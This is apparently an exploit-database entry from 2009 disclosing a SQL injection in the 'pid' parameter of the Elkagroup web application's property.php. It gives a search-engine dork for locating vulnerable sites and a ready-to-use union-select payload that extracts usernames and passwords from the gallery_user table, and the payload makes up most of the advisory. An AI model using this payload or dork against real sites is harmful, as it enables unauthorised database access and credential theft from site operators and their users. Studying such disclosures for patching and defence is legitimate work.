Elkagroup - 'pid' SQL Injection

Author: Hussin X
type: webapps
platform: php
port: 
date_added: 2009-12-29  
date_updated:   
verified: 0  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 10836.txt  

elkagroup (pid ) Remote SQL Injection Vulnerability

||    Author: Hussin X

||   Home :  WwW.IQ-TY.CoM<http://WwW.IQ-TY.CoM>

||    email:  darkangel_g85[at]Yahoo[DoT]com


||| script : http://www.elkapax.com &  http://www.elkagroup.com

||| DorK   : "Powered by : elkagroup.com<http://elkagroup.com>"

POC
________

http://[server]/[path]/property.php?cid=12&uid=0&pid=-168+union+select+1,username,3,4,5,6,7,password,9,10,11,12,13,14,15,16,17+from+gallery_user--

end

IQ-SecuritY FoRuM